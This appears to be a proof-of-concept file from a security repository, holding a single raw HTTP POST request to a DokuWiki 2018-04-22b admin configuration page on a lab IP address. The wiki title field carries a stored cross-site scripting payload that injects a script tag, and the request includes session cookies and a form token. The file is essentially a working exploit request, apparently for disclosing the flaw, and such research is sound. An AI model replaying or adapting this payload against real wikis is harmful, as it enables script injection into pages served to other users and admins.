-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathdokuwiki-2018-04-22b-xss.txt
16 lines (15 loc) · 8.42 KB
/
dokuwiki-2018-04-22b-xss.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /doku.php HTTP/1.1
Host: 192.168.1.49
Content-Length: 7726
Cache-Control: max-age=0
Origin: http://192.168.1.49
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.1.49/doku.php?id=start&do=admin&page=config
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: DokuWiki=8h3a23e7c2lnhj6q3g69bcb17l; DW68700bfd16c2027de7de74a5a8202a6f=dXNlcg%3D%3D%7C0%7C0pDGaOqk89XqSSg6qfAn1i6oHNRYzJbctgXDGkKcqv0%3D; DOKU_PREFS=list%23thumbs%23ext_enabled%231%23ext_disabled%231%23ext_updatable%231
Connection: close
id=start§ok=7d0965a15bb314aefc1866dfb6870d3e&config%5Btitle%5D=user's%20DokuWiki!%7d%7dsc94n%3cscript%3econfirm(1)%3c%2fscript%3epnhi4&config%5Bstart%5D=start&config%5Blang%5D=en&config%5Btagline%5D=&config%5Bsidebar%5D=sidebar&config%5Blicense%5D=cc-by-nc-sa&config%5Bsavedir%5D=%2Fopt%2Fbitnami%2Fapps%2Fdokuwiki%2Fhtdocs%2Fdata&config%5Bbasedir%5D=&config%5Bbaseurl%5D=&config%5Bcookiedir%5D=&config%5Bdmode%5D=0755&config%5Bfmode%5D=0644&config%5Brecent%5D=20&config%5Brecent_days%5D=7&config%5Bbreadcrumbs%5D=10&config%5Btypography%5D=1&config%5Bdformat%5D=%25Y%2F%25m%2F%25d+%25H%3A%25M&config%5Bsignature%5D=+---+%2F%2F%5B%5B%40MAIL%40%7C%40NAME%40%5D%5D+%40DATE%40%2F%2F&config%5Bshowuseras%5D=loginname&config%5Btoptoclevel%5D=1&config%5Btocminheads%5D=3&config%5Bmaxtoclevel%5D=3&config%5Bmaxseclevel%5D=3&config%5Bdeaccent%5D=1&config%5Buseheading%5D=0&config%5Bhidepages%5D=&config%5Buseacl%5D=1&config%5Bautopasswd%5D=1&config%5Bauthtype%5D=authplain&config%5Bpasscrypt%5D=smd5&config%5Bdefaultgroup%5D=user&config%5Bsuperuser%5D=%40admin&config%5Bmanager%5D=%21%21not+set%21%21&config%5Bprofileconfirm%5D=1&config%5Brememberme%5D=1&config%5Bdisableactions%5D%5Bother%5D=&config%5Bauth_security_timeout%5D=900&config%5Bsecurecookie%5D=1&config%5Bremoteuser%5D=%21%21not+set%21%21&config%5Busewordblock%5D=1&config%5Brelnofollow%5D=1&config%5Bindexdelay%5D=60*60*24*5&config%5Bmailguard%5D=hex&config%5Biexssprotect%5D=1&config%5Busedraft%5D=1&config%5Blocktime%5D=15*60&config%5Bcachetime%5D=60*60*24&config%5Btarget____wiki%5D=&config%5Btarget____interwiki%5D=&config%5Btarget____extern%5D=&config%5Btarget____media%5D=&config%5Btarget____windows%5D=&config%5Bmediarevisions%5D=1&config%5Bgdlib%5D=2&config%5Bim_convert%5D=&config%5Bjpg_quality%5D=70&config%5Bfetchsize%5D=0&config%5Brefcheck%5D=1&config%5Bsubscribe_time%5D=24*60*60&config%5Bnotify%5D=&config%5Bregisternotify%5D=&config%5Bmailfrom%5D=&config%5Bmailreturnpath%5D=&config%5Bmailprefix%5D=&config%5Bhtmlmail%5D=1&config%5Bsitemap%5D=0&config%5Brss_type%5D=rss1&config%5Brss_linkto%5D=diff&config%5Brss_content%5D=abstract&config%5Brss_media%5D=both&config%5Brss_update%5D=5*60&config%5Brss_show_summary%5D=1&config%5Bupdatecheck%5D=1&config%5Buserewrite%5D=0&config%5Bsepchar%5D=_&config%5Bfnencode%5D=url&config%5Bcompress%5D=1&config%5Bcssdatauri%5D=512&config%5Bcompression%5D=gz&config%5Bxsendfile%5D=0&config%5Breaddircache%5D=0&config%5Bsearch_nslimit%5D=0&config%5Bsearch_fragment%5D=exact&config%5Bdnslookups%5D=1&config%5Bjquerycdn%5D=0&config%5Bproxy____host%5D=&config%5Bproxy____port%5D=&config%5Bproxy____user%5D=&config%5Bproxy____pass%5D=&config%5Bproxy____except%5D=&config%5Bftp____host%5D=localhost&config%5Bftp____port%5D=21&config%5Bftp____user%5D=user&config%5Bftp____pass%5D=&config%5Bftp____root%5D=%2Fhome%2Fuser%2Fhtdocs&config%5Bplugin____authmysql____server%5D=&config%5Bplugin____authmysql____user%5D=&config%5Bplugin____authmysql____password%5D=&config%5Bplugin____authmysql____database%5D=&config%5Bplugin____authmysql____charset%5D=utf8&config%5Bplugin____authmysql____debug%5D=0&config%5Bplugin____authmysql____TablesToLock%5D=&config%5Bplugin____authmysql____checkPass%5D=&config%5Bplugin____authmysql____getUserInfo%5D=&config%5Bplugin____authmysql____getGroups%5D=&config%5Bplugin____authmysql____getUsers%5D=&config%5Bplugin____authmysql____FilterLogin%5D=&config%5Bplugin____authmysql____FilterName%5D=&config%5Bplugin____authmysql____FilterEmail%5D=&config%5Bplugin____authmysql____FilterGroup%5D=&config%5Bplugin____authmysql____SortOrder%5D=&config%5Bplugin____authmysql____addUser%5D=&config%5Bplugin____authmysql____addGroup%5D=&config%5Bplugin____authmysql____addUserGroup%5D=&config%5Bplugin____authmysql____delGroup%5D=&config%5Bplugin____authmysql____getUserID%5D=&config%5Bplugin____authmysql____delUser%5D=&config%5Bplugin____authmysql____delUserRefs%5D=&config%5Bplugin____authmysql____updateUser%5D=&config%5Bplugin____authmysql____UpdateLogin%5D=&config%5Bplugin____authmysql____UpdatePass%5D=&config%5Bplugin____authmysql____UpdateEmail%5D=&config%5Bplugin____authmysql____UpdateName%5D=&config%5Bplugin____authmysql____UpdateTarget%5D=&config%5Bplugin____authmysql____delUserGroup%5D=&config%5Bplugin____authmysql____getGroupID%5D=&config%5Bplugin____smtp____smtp_host%5D=localhost&config%5Bplugin____smtp____smtp_port%5D=25&config%5Bplugin____smtp____smtp_ssl%5D=&config%5Bplugin____smtp____auth_user%5D=&config%5Bplugin____smtp____auth_pass%5D=&config%5Bplugin____smtp____localdomain%5D=&config%5Bplugin____authldap____server%5D=&config%5Bplugin____authldap____port%5D=389&config%5Bplugin____authldap____usertree%5D=&config%5Bplugin____authldap____grouptree%5D=&config%5Bplugin____authldap____userfilter%5D=&config%5Bplugin____authldap____groupfilter%5D=&config%5Bplugin____authldap____version%5D=2&config%5Bplugin____authldap____referrals%5D=-1&config%5Bplugin____authldap____deref%5D=0&config%5Bplugin____authldap____binddn%5D=&config%5Bplugin____authldap____bindpw%5D=&config%5Bplugin____authldap____userscope%5D=sub&config%5Bplugin____authldap____groupscope%5D=sub&config%5Bplugin____authldap____userkey%5D=uid&config%5Bplugin____authldap____groupkey%5D=cn&config%5Bplugin____authldap____modPass%5D=1&config%5Bplugin____authpgsql____server%5D=&config%5Bplugin____authpgsql____port%5D=5432&config%5Bplugin____authpgsql____user%5D=&config%5Bplugin____authpgsql____password%5D=&config%5Bplugin____authpgsql____database%5D=&config%5Bplugin____authpgsql____checkPass%5D=&config%5Bplugin____authpgsql____getUserInfo%5D=&config%5Bplugin____authpgsql____getGroups%5D=&config%5Bplugin____authpgsql____getUsers%5D=&config%5Bplugin____authpgsql____FilterLogin%5D=&config%5Bplugin____authpgsql____FilterName%5D=&config%5Bplugin____authpgsql____FilterEmail%5D=&config%5Bplugin____authpgsql____FilterGroup%5D=&config%5Bplugin____authpgsql____SortOrder%5D=&config%5Bplugin____authpgsql____addUser%5D=&config%5Bplugin____authpgsql____addGroup%5D=&config%5Bplugin____authpgsql____addUserGroup%5D=&config%5Bplugin____authpgsql____delGroup%5D=&config%5Bplugin____authpgsql____getUserID%5D=&config%5Bplugin____authpgsql____delUser%5D=&config%5Bplugin____authpgsql____delUserRefs%5D=&config%5Bplugin____authpgsql____updateUser%5D=&config%5Bplugin____authpgsql____UpdateLogin%5D=&config%5Bplugin____authpgsql____UpdatePass%5D=&config%5Bplugin____authpgsql____UpdateEmail%5D=&config%5Bplugin____authpgsql____UpdateName%5D=&config%5Bplugin____authpgsql____UpdateTarget%5D=&config%5Bplugin____authpgsql____delUserGroup%5D=&config%5Bplugin____authpgsql____getGroupID%5D=&config%5Bplugin____authpdo____dsn%5D=&config%5Bplugin____authpdo____user%5D=&config%5Bplugin____authpdo____pass%5D=&config%5Bplugin____authpdo____select-user%5D=&config%5Bplugin____authpdo____check-pass%5D=&config%5Bplugin____authpdo____select-user-groups%5D=&config%5Bplugin____authpdo____select-groups%5D=&config%5Bplugin____authpdo____insert-user%5D=&config%5Bplugin____authpdo____delete-user%5D=&config%5Bplugin____authpdo____list-users%5D=&config%5Bplugin____authpdo____count-users%5D=&config%5Bplugin____authpdo____update-user-info%5D=&config%5Bplugin____authpdo____update-user-login%5D=&config%5Bplugin____authpdo____update-user-pass%5D=&config%5Bplugin____authpdo____insert-group%5D=&config%5Bplugin____authpdo____join-group%5D=&config%5Bplugin____authpdo____leave-group%5D=&config%5Bplugin____authad____account_suffix%5D=&config%5Bplugin____authad____base_dn%5D=&config%5Bplugin____authad____domain_controllers%5D=&config%5Bplugin____authad____sso_charset%5D=&config%5Bplugin____authad____admin_username%5D=&config%5Bplugin____authad____admin_password%5D=&config%5Bplugin____authad____expirywarn%5D=0&config%5Bplugin____authad____additional%5D=&do=admin&page=config&save=1&submit=